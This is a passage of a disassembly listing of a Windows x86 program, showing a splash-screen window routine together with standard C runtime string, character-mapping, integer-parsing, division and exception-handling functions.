var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 58h
push edi
mov eax, [ebp+arg_0]
mov ds:dword_4A6A50, eax
and [ebp+var_38], 0
xor eax, eax
lea edi, [ebp+var_34]
stosd
stosd
stosd
stosd
stosd
lea eax, [ebp+var_38]
push eax
push 18h
push [ebp+arg_0]
call ds:dword_4A27F8 ; GetObjectA
mov ds:dword_4A6A60, 30h
mov ds:dword_4A6A68, offset sub_48D15E
mov ds:dword_4A6A88, offset aCc7574e45e3947 ; "{CC7574E4-5E39-4700-B286-269A82DD8E95}"
push 0
call ds:dword_4A2718 ; GetModuleHandleA
mov ds:dword_4A6A74, eax
push offset dword_4A6A60
call ds:dword_4A2814 ; RegisterClassExA
push 10h
call ds:dword_4A2818 ; GetSystemMetrics
mov [ebp+var_20], eax
push 11h
call ds:dword_4A2818 ; GetSystemMetrics
mov [ebp+var_18], eax
mov eax, [ebp+var_20]
sub eax, [ebp+var_34]
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
sub eax, [ebp+var_30]
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_10], eax
mov eax, [ebp+var_14]
add eax, [ebp+var_34]
mov [ebp+var_C], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_30]
mov [ebp+var_8], eax
mov [ebp+var_58], 98800000h
push 0
push 0
push [ebp+var_58]
lea eax, [ebp+var_14]
push eax
call ds:dword_49F054 ; AdjustWindowRectEx
push 0
push 0
push 0
push 0
mov eax, [ebp+var_8]
sub eax, [ebp+var_10]
push eax
mov eax, [ebp+var_C]
sub eax, [ebp+var_14]
push eax
push [ebp+var_10]
push [ebp+var_14]
push [ebp+var_58]
push offset dword_4A2918
push offset aCc7574e45e3947 ; "{CC7574E4-5E39-4700-B286-269A82DD8E95}"
push 0
call ds:dword_4A281C ; CreateWindowExA
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ds:dword_4A6A54, eax
loc_48D36B: ; CODE XREF: sub_48D271+133�j
push 0
push 0
push [ebp+var_4]
lea eax, [ebp+var_54]
push eax
call ds:dword_4A2820 ; GetMessageA
test eax, eax
jz short loc_48D3A6
mov eax, [ebp+var_54]
cmp eax, [ebp+var_4]
jnz short loc_48D390
cmp [ebp+var_50], 0
jnz short loc_48D390
jmp short loc_48D3A6
; ---------------------------------------------------------------------------
loc_48D390: ; CODE XREF: sub_48D271+115�j
; sub_48D271+11B�j
lea eax, [ebp+var_54]
push eax
call ds:dword_4A2824 ; TranslateMessage
lea eax, [ebp+var_54]
push eax
call ds:dword_4A2828 ; DispatchMessageA
jmp short loc_48D36B
; ---------------------------------------------------------------------------
loc_48D3A6: ; CODE XREF: sub_48D271+10D�j
; sub_48D271+11D�j
push 64h
call ds:dword_4A2794 ; Sleep
and [ebp+var_1C], 0
jmp short loc_48D3BB
; ---------------------------------------------------------------------------
loc_48D3B4: ; CODE XREF: sub_48D271+170�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_48D3BB: ; CODE XREF: sub_48D271+141�j
cmp [ebp+var_1C], 64h
jge short loc_48D3E3
push 0
push offset sub_48D216
call ds:dword_4A2830 ; EnumWindows
cmp ds:dword_4A6A54, 0
jnz short loc_48D3D9
jmp short loc_48D3E3
; ---------------------------------------------------------------------------
loc_48D3D9: ; CODE XREF: sub_48D271+164�j
push 64h
call ds:dword_4A2794 ; Sleep
jmp short loc_48D3B4
; ---------------------------------------------------------------------------
loc_48D3E3: ; CODE XREF: sub_48D271+14E�j
; sub_48D271+166�j
push [ebp+arg_0]
call ds:dword_4A2800 ; DeleteObject
xor eax, eax
pop edi
leave
retn 4
sub_48D271 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48D3F3 proc near ; CODE XREF: sub_495DC0+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push 0
lea eax, [ebp+var_4]
push eax
push 3
push 80000000h
push offset a_splashscreen_ ; "_splashscreen.bmp"
call sub_491346
test eax, eax
jz short locret_48D450
push [ebp+var_4]
call sub_496456
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_48D446
push offset dword_4A6A58
push 0
push [ebp+var_8]
push offset sub_48D271
push 0
push 0
call ds:dword_4A283C ; CreateThread
push 64h
call ds:dword_4A2794 ; Sleep
loc_48D446: ; CODE XREF: sub_48D3F3+30�j
push 0
push [ebp+var_4]
call sub_491741
locret_48D450: ; CODE XREF: sub_48D3F3+1E�j
leave
retn
sub_48D3F3 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48D454 proc near ; CODE XREF: sub_48D54C+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_48D46C
push [ebp+arg_0]
call sub_48DF68 ; RtlUnwind
loc_48D46C: ; DATA XREF: sub_48D454+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_48D454 endp
; =============== S U B R O U T I N E =======================================
sub_48D474 proc near ; DATA XREF: sub_48D496+A�o
; _4:0048D507�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_48D495
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_48D495: ; CODE XREF: sub_48D474+10�j
retn
sub_48D474 endp
; =============== S U B R O U T I N E =======================================
sub_48D496 proc near ; CODE XREF: sub_48D54C+67�p
; sub_48D54C+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_48D474
push large dword ptr fs:0
mov large fs:0, esp
loc_48D4B3: ; CODE XREF: sub_48D496:loc_48D4EE�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_48D4F0
cmp esi, [esp+1Ch+arg_4]
jz short loc_48D4F0
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_48D4EE
push 101h
mov eax, [ebx+esi*4+8]
call sub_48D52A
call dword ptr [ebx+esi*4+8]
loc_48D4EE: ; CODE XREF: sub_48D496+44�j
jmp short loc_48D4B3
; ---------------------------------------------------------------------------
loc_48D4F0: ; CODE XREF: sub_48D496+2A�j
; sub_48D496+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_48D496 endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_48D474
jnz short locret_48D520
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_48D520
mov eax, 1
locret_48D520: ; CODE XREF: _4:0048D50E�j _4:0048D519�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_4A2434
jmp short loc_48D534
; =============== S U B R O U T I N E =======================================
sub_48D52A proc near ; CODE XREF: sub_48D496+4F�p
; sub_48D54C+78�p
push ebx
push ecx
mov ebx, offset dword_4A2434
mov ecx, [ebp+8]
loc_48D534: ; CODE XREF: _4:0048D528�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_48D52A endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48D54C proc near ; DATA XREF: sub_48D000+A�o
; sub_48DA80+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_48D5EC
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_48D57F: ; CODE XREF: sub_48D54C+90�j
cmp esi, 0FFFFFFFFh
jz short loc_48D5E5
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_48D5D3
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_48D5D3
js short loc_48D5DE
mov edi, [ebx+8]
push ebx
call sub_48D454
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_48D496
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_48D52A
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_48D5D3: ; CODE XREF: sub_48D54C+40�j
; sub_48D54C+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_48D57F
; ---------------------------------------------------------------------------
loc_48D5DE: ; CODE XREF: sub_48D54C+54�j
mov eax, 0
jmp short loc_48D601
; ---------------------------------------------------------------------------
loc_48D5E5: ; CODE XREF: sub_48D54C+36�j
mov eax, 1
jmp short loc_48D601
; ---------------------------------------------------------------------------
loc_48D5EC: ; CODE XREF: sub_48D54C+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_48D496
add esp, 8
pop ebp
mov eax, 1
loc_48D601: ; CODE XREF: sub_48D54C+97�j
; sub_48D54C+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_48D54C endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_48D496
add esp, 8
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_48D640
loc_48D630: ; CODE XREF: sub_48D640+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_48D640
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_48D640 proc near ; CODE XREF: sub_490166+2A�p
; sub_499A16+AF�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 0048D630 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_48D66B
loc_48D658: ; CODE XREF: sub_48D640+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_48D630
test cl, cl
jz short loc_48D6B4
test edx, 3
jnz short loc_48D658
loc_48D66B: ; CODE XREF: sub_48D640+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_48D676: ; CODE XREF: sub_48D640+61�j
; sub_48D640+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_48D6B8
and eax, 81010100h
jz short loc_48D676
and eax, 1010100h
jnz short loc_48D6B2
and esi, 80000000h
jnz short loc_48D676
loc_48D6B2: ; CODE XREF: sub_48D640+68�j
; sub_48D640+81�j ...
pop esi
pop edi
loc_48D6B4: ; CODE XREF: sub_48D640+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_48D6B8: ; CODE XREF: sub_48D640+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_48D6F5
test al, al
jz short loc_48D6B2
cmp ah, bl
jz short loc_48D6EE
test ah, ah
jz short loc_48D6B2
shr eax, 10h
cmp al, bl
jz short loc_48D6E7
test al, al
jz short loc_48D6B2
cmp ah, bl
jz short loc_48D6E0
test ah, ah
jz short loc_48D6B2
jmp short loc_48D676
; ---------------------------------------------------------------------------
loc_48D6E0: ; CODE XREF: sub_48D640+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_48D6E7: ; CODE XREF: sub_48D640+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_48D6EE: ; CODE XREF: sub_48D640+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_48D6F5: ; CODE XREF: sub_48D640+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_48D640 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48D700 proc near ; CODE XREF: sub_490252+FB�p
; sub_493DD0+161�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_48D721
xor eax, eax
jmp short loc_48D723
; ---------------------------------------------------------------------------
loc_48D721: ; CODE XREF: sub_48D700+1B�j
mov eax, edi
loc_48D723: ; CODE XREF: sub_48D700+1F�j
cld
pop edi
leave
retn
sub_48D700 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48D730 proc near ; CODE XREF: sub_49253F+5E�p
; sub_49253F+1AB�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_48D761
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_48D75F
jz short loc_48D761
dec ecx
dec ecx
loc_48D75F: ; CODE XREF: sub_48D730+29�j
not ecx
loc_48D761: ; CODE XREF: sub_48D730+9�j
; sub_48D730+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_48D730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_48D770 proc near ; CODE XREF: sub_492CC4+1AF�p
; sub_492CC4+434�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_48D7F3
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_48D794
shr ecx, 2
jnz short loc_48D801
jmp short loc_48D7B5
; ---------------------------------------------------------------------------
loc_48D794: ; CODE XREF: sub_48D770+1B�j
; sub_48D770+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_48D7C2
test al, al
jz short loc_48D7CA
test esi, 3
jnz short loc_48D794
mov ebx, ecx
shr ecx, 2
jnz short loc_48D801
loc_48D7B0: ; CODE XREF: sub_48D770+8F�j
and ebx, 3
jz short loc_48D7C2
loc_48D7B5: ; CODE XREF: sub_48D770+22�j
; sub_48D770+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_48D7EE
dec ebx
jnz short loc_48D7B5
loc_48D7C2: ; CODE XREF: sub_48D770+2B�j
; sub_48D770+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_48D7CA: ; CODE XREF: sub_48D770+2F�j
test edi, 3
jz short loc_48D7E4
loc_48D7D2: ; CODE XREF: sub_48D770+72�j
mov [edi], al
inc edi
dec ecx
jz loc_48D866
test edi, 3
jnz short loc_48D7D2
loc_48D7E4: ; CODE XREF: sub_48D770+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_48D857
loc_48D7EB: ; CODE XREF: sub_48D770+7F�j
; sub_48D770+F4�j
mov [edi], al
inc edi
loc_48D7EE: ; CODE XREF: sub_48D770+4D�j
dec ebx
jnz short loc_48D7EB
pop ebx
pop esi
loc_48D7F3: ; CODE XREF: sub_48D770+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_48D7F9: ; CODE XREF: sub_48D770+A9�j
; sub_48D770+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_48D7B0
loc_48D801: ; CODE XREF: sub_48D770+20�j
; sub_48D770+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_48D7F9
test dl, dl
jz short loc_48D84B
test dh, dh
jz short loc_48D841
test edx, 0FF0000h
jz short loc_48D837
test edx, 0FF000000h
jnz short loc_48D7F9
mov [edi], edx
jmp short loc_48D84F
; ---------------------------------------------------------------------------
loc_48D837: ; CODE XREF: sub_48D770+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_48D84F
; ---------------------------------------------------------------------------
loc_48D841: ; CODE XREF: sub_48D770+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_48D84F
; ---------------------------------------------------------------------------
loc_48D84B: ; CODE XREF: sub_48D770+AD�j
xor edx, edx
mov [edi], edx
loc_48D84F: ; CODE XREF: sub_48D770+C5�j
; sub_48D770+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_48D861
loc_48D857: ; CODE XREF: sub_48D770+79�j
xor eax, eax
loc_48D859: ; CODE XREF: sub_48D770+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_48D859
loc_48D861: ; CODE XREF: sub_48D770+E5�j
and ebx, 3
jnz short loc_48D7EB
loc_48D866: ; CODE XREF: sub_48D770+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_48D770 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48D86E proc near ; CODE XREF: sub_48D0D6+24�p
; sub_48D0D6+2F�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4A70F4, 0
push ebx
push esi
push edi
jnz short loc_48D89B
mov eax, [ebp+arg_0]
cmp eax, 41h
jl loc_48D934
cmp eax, 5Ah
jg loc_48D934
add eax, 20h
jmp loc_48D934
; ---------------------------------------------------------------------------
loc_48D89B: ; CODE XREF: sub_48D86E+E�j
mov ebx, [ebp+arg_0]
mov edi, 100h
push 1
cmp ebx, edi
pop esi
jge short loc_48D8CF
cmp ds:dword_4A265C, esi
jle short loc_48D8BD
push esi
push ebx
call sub_48DCCF
pop ecx
pop ecx
jmp short loc_48D8C7
; ---------------------------------------------------------------------------
loc_48D8BD: ; CODE XREF: sub_48D86E+42�j
mov eax, ds:off_4A2450
mov al, [eax+ebx*2]
and eax, esi
loc_48D8C7: ; CODE XREF: sub_48D86E+4D�j
test eax, eax
jnz short loc_48D8CF
loc_48D8CB: ; CODE XREF: sub_48D86E+AD�j
mov eax, ebx
jmp short loc_48D934
; ---------------------------------------------------------------------------
loc_48D8CF: ; CODE XREF: sub_48D86E+3A�j
; sub_48D86E+5B�j
mov edx, ds:off_4A2450
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_48D8F3
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_48D8FC
; ---------------------------------------------------------------------------
loc_48D8F3: ; CODE XREF: sub_48D86E+74�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, esi
loc_48D8FC: ; CODE XREF: sub_48D86E+83�j
push esi
push 0
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push edi
push ds:dword_4A70F4
call sub_48DA80
add esp, 20h
test eax, eax
jz short loc_48D8CB
cmp eax, esi
jnz short loc_48D927
movzx eax, [ebp+var_4]
jmp short loc_48D934
; ---------------------------------------------------------------------------
loc_48D927: ; CODE XREF: sub_48D86E+B1�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_48D934: ; CODE XREF: sub_48D86E+16�j
; sub_48D86E+1F�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_48D86E endp
; ---------------------------------------------------------------------------
align 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+14h]
or eax, eax
jge short loc_48D961
inc edi
mov edx, [esp+10h]
neg eax
neg edx
sbb eax, 0
mov [esp+14h], eax
mov [esp+10h], edx
loc_48D961: ; CODE XREF: _4:0048D94B�j
mov eax, [esp+1Ch]
or eax, eax
jge short loc_48D97D
inc edi
mov edx, [esp+18h]
neg eax
neg edx
sbb eax, 0
mov [esp+1Ch], eax
mov [esp+18h], edx
loc_48D97D: ; CODE XREF: _4:0048D967�j
or eax, eax
jnz short loc_48D999
mov ecx, [esp+18h]
mov eax, [esp+14h]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+10h]
div ecx
mov edx, ebx
jmp short loc_48D9DA
; ---------------------------------------------------------------------------
loc_48D999: ; CODE XREF: _4:0048D97F�j
mov ebx, eax
mov ecx, [esp+18h]
mov edx, [esp+14h]
mov eax, [esp+10h]
loc_48D9A7: ; CODE XREF: _4:0048D9B1�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_48D9A7
div ecx
mov esi, eax
mul dword ptr [esp+1Ch]
mov ecx, eax
mov eax, [esp+18h]
mul esi
add edx, ecx
jb short loc_48D9D5
cmp edx, [esp+14h]
ja short loc_48D9D5
jb short loc_48D9D6
cmp eax, [esp+10h]
jbe short loc_48D9D6
loc_48D9D5: ; CODE XREF: _4:0048D9C5�j _4:0048D9CB�j
dec esi
loc_48D9D6: ; CODE XREF: _4:0048D9CD�j _4:0048D9D3�j
xor edx, edx
mov eax, esi
loc_48D9DA: ; CODE XREF: _4:0048D997�j
dec edi
jnz short loc_48D9E4
neg edx
neg eax
sbb edx, 0
loc_48D9E4: ; CODE XREF: _4:0048D9DB�j
pop ebx
pop esi
pop edi
retn 10h
; =============== S U B R O U T I N E =======================================
sub_48D9EA proc near ; CODE XREF: sub_48DA75+4�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_48D9F2: ; CODE XREF: sub_48D9EA+34�j
cmp ds:dword_4A265C, 1
jle short loc_48DA0A
movzx eax, byte ptr [edi]
push 8
push eax
call sub_48DCCF
pop ecx
pop ecx
jmp short loc_48DA19
; ---------------------------------------------------------------------------
loc_48DA0A: ; CODE XREF: sub_48D9EA+F�j
movzx eax, byte ptr [edi]
mov ecx, ds:off_4A2450
mov al, [ecx+eax*2]
and eax, 8
loc_48DA19: ; CODE XREF: sub_48D9EA+1E�j
test eax, eax
jz short loc_48DA20
inc edi
jmp short loc_48D9F2
; ---------------------------------------------------------------------------
loc_48DA20: ; CODE XREF: sub_48D9EA+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_48DA30
cmp esi, 2Bh
jnz short loc_48DA34
loc_48DA30: ; CODE XREF: sub_48D9EA+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_48DA34: ; CODE XREF: sub_48D9EA+44�j
xor ebx, ebx
loc_48DA36: ; CODE XREF: sub_48D9EA+7B�j
cmp ds:dword_4A265C, 1
jle short loc_48DA4B
push 4
push esi
call sub_48DCCF
pop ecx
pop ecx
jmp short loc_48DA56
; ---------------------------------------------------------------------------
loc_48DA4B: ; CODE XREF: sub_48D9EA+53�j
mov eax, ds:off_4A2450
mov al, [eax+esi*2]
and eax, 4
loc_48DA56: ; CODE XREF: sub_48D9EA+5F�j
test eax, eax
jz short loc_48DA67
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_48DA36
; ---------------------------------------------------------------------------
loc_48DA67: ; CODE XREF: sub_48D9EA+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_48DA70
neg eax
loc_48DA70: ; CODE XREF: sub_48D9EA+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_48D9EA endp
; =============== S U B R O U T I N E =======================================
sub_48DA75 proc near ; CODE XREF: sub_49BD0C+5F�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_48D9EA
pop ecx
retn
sub_48DA75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48DA80 proc near ; CODE XREF: sub_48D86E+A3�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49FB08
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp ds:dword_4A70E8, edi
jnz short loc_48DAF6
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_49FB00
mov esi, 100h
push esi
push edi
call ds:dword_49F034 ; LCMapStringW
test eax, eax
jz short loc_48DAD4
mov ds:dword_4A70E8, ebx
jmp short loc_48DAF6
; ---------------------------------------------------------------------------
loc_48DAD4: ; CODE XREF: sub_48DA80+4A�j
push edi
push edi
push ebx
push offset dword_49FAFC
push esi
push edi
call ds:dword_49F038 ; LCMapStringA
test eax, eax
jz loc_48DC0E
mov ds:dword_4A70E8, 2
loc_48DAF6: ; CODE XREF: sub_48DA80+2E�j
; sub_48DA80+52�j
cmp [ebp+arg_C], edi
jle short loc_48DB0B
push [ebp+arg_C]
push [ebp+arg_8]
call sub_48DCA4
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_48DB0B: ; CODE XREF: sub_48DA80+79�j
mov eax, ds:dword_4A70E8
cmp eax, 2
jnz short loc_48DB32
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_49F038 ; LCMapStringA
jmp loc_48DC10
; ---------------------------------------------------------------------------
loc_48DB32: ; CODE XREF: sub_48DA80+93�j
cmp eax, 1
jnz loc_48DC0E
cmp [ebp+arg_18], edi
jnz short loc_48DB48
mov eax, ds:dword_4A7104
mov [ebp+arg_18], eax
loc_48DB48: ; CODE XREF: sub_48DA80+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call ds:dword_49F044 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_48DC0E
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_48DD90
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_48DBA3
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_48DBA3: ; CODE XREF: sub_48DA80+10E�j
cmp [ebp+var_24], edi
jz short loc_48DC0E
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call ds:dword_49F044 ; MultiByteToWideChar
test eax, eax
jz short loc_48DC0E
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_49F034 ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_48DC0E
test byte ptr [ebp+arg_4+1], 4
jz short loc_48DC22
cmp [ebp+arg_14], edi
jz loc_48DC9D
cmp esi, [ebp+arg_14]
jg short loc_48DC0E
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_49F034 ; LCMapStringW
test eax, eax
jnz loc_48DC9D
